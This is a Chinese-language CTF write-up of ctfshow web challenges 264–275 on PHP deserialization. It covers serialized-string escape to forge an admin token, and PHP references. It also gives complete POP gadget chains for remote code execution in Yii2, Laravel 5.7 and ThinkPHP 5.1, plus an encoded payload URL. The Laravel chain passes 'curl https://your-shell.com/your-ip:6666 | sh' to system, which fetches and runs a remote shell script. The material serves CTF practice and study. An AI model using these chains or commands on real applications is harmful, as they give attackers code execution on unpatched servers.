PHP serialize&unserialize Study writeup(4)

前言

最近开python的re模块 那个学烦了就继续打靶

Web264

拿到index.php直接去访问message.php 构造exp

index.php

接着访问message.php

如262类似 但我尝试了262的方法没法一步到位了

只能从Index.php->message.php了

运用到字符串逃逸的知识

web264->字符串逃逸

我们构造一个exp本地测试一下

<?php
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$msg = new message("1","2",'fuck');
$umsg = str_replace('fuck', 'loveU', serialize($msg));

// O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:4:"fuck";s:5:"token";s:4:"user";}
echo serialize($msg);
echo "\n";
// O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:4:"loveU";s:5:"token";s:4:"user";}
echo $umsg;

?>
 

先替换一波将fuck->loveU发现长度未变 但内容发生改变

这样替换后只会截取love而不会截取U逃匿出来就有U

接着我们替换闭合”和}

发现位数等于31

所以我们要把他的位数对齐才能正常反序列化过来

替换fuck一直到位数到齐

此时}”后面的会被舍弃 我们的user就能变成admin

访问message.php根据题目要求

我们再次进行url+base64编码 手动设置cookie

最终exp

<?php

class message{
    public $from;
    public $msg;
    public $to;
    public $token;
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$msg = new message("1","2",'fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}');
$umsg = str_replace('fuck', 'loveU', serialize($msg));
$p=serialize($msg);
// O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:135:"fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}
//echo serialize($msg);
print_r($p);
print_r(unserialize($p))."\n";
// O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:135:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}
echo urlencode(base64_encode($umsg));

//?>

web265

分析一波

mt_rand是不是很熟悉 在爆破那里我们遇见了 生成随机种子

我们只能控制一个参数 这样就导致二者不相等 所以我们需要php中的引用即c语言里面的指针

使用&将password指向token

exp:

<?php

class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = &$this->token;
    }
    public function login(){
        return $this->token===$this->password;
    }
}
$p=new ctfshowAdmin('1','1');
print_r(serialize($p));


?>

Web266

绕过错误正确执行销毁就可

没有加i 直接改个大小写即可

exp：

<?php

class ctfshow
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
}
$p=new ctfshow();
print_r(serialize($p));
?>

Web267

登录界面

尝试弱密码登录 admin->admin

登录之后查看about

yii框架 因为是 2020年的CVE 而且大都已更新 历史遗留资产也很少没有复现 就套了别人的POC

https://blog.csdn.net/weixin_44576725/article/details/123986819

根据

源代码中的提示

发现页面提示在/backdoor/shell里

反序列化get后的code

因为是公开漏洞 这里就用别人的反序列化的pop链子 让咱写咱也不会呀(
pop链: system等无回显用passthru代替(之前我们也见过

$this->checkAccess = ‘passthru’; 具体执行的命令函数

$this->id = ‘cat /flag’; 具体内容

<?php

namespace yii\db {

    use yii\web\DbSession;

    class BatchQueryResult
    {
        private $_dataReader;

        public function __construct()
        {
            $this->_dataReader = new DbSession();
        }
    }
}

namespace yii\web {

    use yii\rest\IndexAction;

    class DbSession
    {
        public function __construct()
        {
            $a = new IndexAction();
            $this->writeCallback = [$a, 'run'];;
        }
    }
}

namespace yii\rest {
    class IndexAction
    {
        public function __construct()
        {
            $this->checkAccess = 'passthru';
            $this->id = 'cat /flag';
        }
    }
}

namespace {

    use yii\db\BatchQueryResult;

    echo base64_encode(serialize(new BatchQueryResult()));
}
?>

payload:

http://3974edc7-81bd-4cfa-975d-47a6608d7d2c.challenge.ctf.show/index.php?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo4OiJwYXNzdGhydSI7czoyOiJpZCI7czo5OiJjYXQgL2ZsYWciO31pOjE7czozOiJydW4iO319fQ==

Web268

查清目录后cp到3.txt

最终pop链

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
//            $this->checkAccess = 'phpinfo';
//            $this->id = '1';

            $this->checkAccess = 'shell_exec';
//            $this->id = 'ls / | tee 1.txt'; #先查出flag位置再获取
            $this->id = 'cp /flags 3.txt';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            // 这里需要改为isRunning
            $this->formatters['isRunning'] = [new CreateAction(), 'run'];
        }
    }
}

// poc2
namespace Codeception\Extension{
    use Faker\Generator;
    class RunProcess{
        private $processes;
        public function __construct()
        {
            $this->processes = [new Generator()];
        }
    }
}
namespace{
    // 生成poc
    echo base64_encode(serialize(new Codeception\Extension\RunProcess()));
}
?>

Web269-Web270

与267到这的大体一样均为yii漏洞框架 flag的名字不一样 这里省略了

Web271-Web273

这里的黄色内容应该是提示

Laravelv5.7漏洞 2019年左右的PHP框架漏洞 网上公开了 POC

我们复现一下反序列化链子

<?php

namespace Illuminate\Foundation\Testing {
    class PendingCommand
    {
        public $test;
        protected $app;
        protected $command;
        protected $parameters;

        public function __construct($test, $app, $command, $parameters)
        {
            $this->test = $test;                 //一个实例化的类 Illuminate\Auth\GenericUser
            $this->app = $app;                   //一个实例化的类 Illuminate\Foundation\Application
            $this->command = $command;           //要执行的php函数 system
            $this->parameters = $parameters;     //要执行的php函数的参数  array('id')
        }
    }
}

namespace Faker {
    class DefaultGenerator
    {
        protected $default;

        public function __construct($default = null)
        {
            $this->default = $default;
        }
    }
}

namespace Illuminate\Foundation {
    class Application
    {
        protected $instances = [];

        public function __construct($instances = [])
        {
            $this->instances['Illuminate\Contracts\Console\Kernel'] = $instances;
        }
    }
}

namespace {
    $defaultgenerator = new Faker\DefaultGenerator(array("hello" => "world"));

    $app = new Illuminate\Foundation\Application();

    $application = new Illuminate\Foundation\Application($app);

    $pendingcommand = new Illuminate\Foundation\Testing\PendingCommand($defaultgenerator, $application, 'system', array('curl https://your-shell.com/your-ip:6666 | sh'));

    echo urlencode(serialize($pendingcommand));
}

Web274

好熟悉,也好老

源代码中反序列化GET接受data

复现一下 thinkphp5.1

Poc链子

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["lin"=>["calc.exe","calc"]];
        $this->data = ["lin"=>new Request()];
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system"; //PHP函数
    protected $config = [
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>'lin']; //PHP函数的参数
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}


namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

&lin后跟执行的命令

发现在根目录 直接拿flag

好

Web275

突破点在system

如果evilfile为true就执行system删除filename但是可以执行后面的内容用;分隔即可

post都不用传

直接拿flag

------本文已结束，感谢您的阅读------